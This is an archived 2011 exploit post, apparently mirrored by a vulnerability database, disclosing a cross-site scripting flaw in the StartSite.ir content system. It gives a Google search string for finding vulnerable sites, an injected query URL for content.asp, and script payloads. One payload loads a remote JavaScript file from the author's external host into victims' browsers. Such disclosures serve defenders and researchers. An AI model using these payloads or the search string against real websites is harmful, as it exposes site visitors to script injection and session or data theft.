Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26071
HistoryApr 06, 2011 - 12:00 a.m.

StartSite.ir Cross-site Scripting Vulnerability

2011-04-0600:00:00
vulners.com
74

#------------In The Name Of God------------

StartSite.ir Cross-site Scripting Vulnerability

###################################
#AUTHOR: md.r00t
#Mail: [email protected]
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:

"Powered by StartSite.ir"

###################################

xss EXPLOIT:

<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS&quot;&gt;&lt;/script&gt;
######VULN IN HERE##################

/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)